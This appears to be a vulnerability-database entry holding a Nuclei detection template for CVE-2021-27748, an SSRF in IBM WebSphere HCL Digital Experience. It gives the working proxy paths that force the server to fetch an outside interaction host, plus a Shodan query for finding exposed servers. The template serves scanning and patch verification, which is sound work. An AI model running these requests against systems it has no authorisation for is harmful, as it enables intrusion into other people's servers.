漏洞描述
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
CVE-2021-27748: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
PoC代码[已公开]
id: CVE-2021-27748
info:
name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
author: pdteam
severity: high
description: |
IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers.
impact: |
Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks.
remediation: |
Apply the latest security patches or updates provided by IBM to mitigate this vulnerability.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
classification:
cve-id: CVE-2021-27748
cpe: cpe:2.3:a:ibm:websphere:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
shodan-query: http.html:"IBM WebSphere Portal"
product: websphere
vendor: ibm
tags: cve2021,cve,hcl,ibm,ssrf,websphere
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
internal: true
words:
- "IBM WebSphere Portal"
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Interactsh Server"
# digest: 4a0a0047304502203de436d3785127b8f23a84e7af82d9265111c47a4fe828d6c61feaaf55ad25de02210088ac4fe4db4064d4579149c30d50eaadb6f7581c53fee5effabde4686b8c23c9:922c64590222798bb761d5b6d8e72950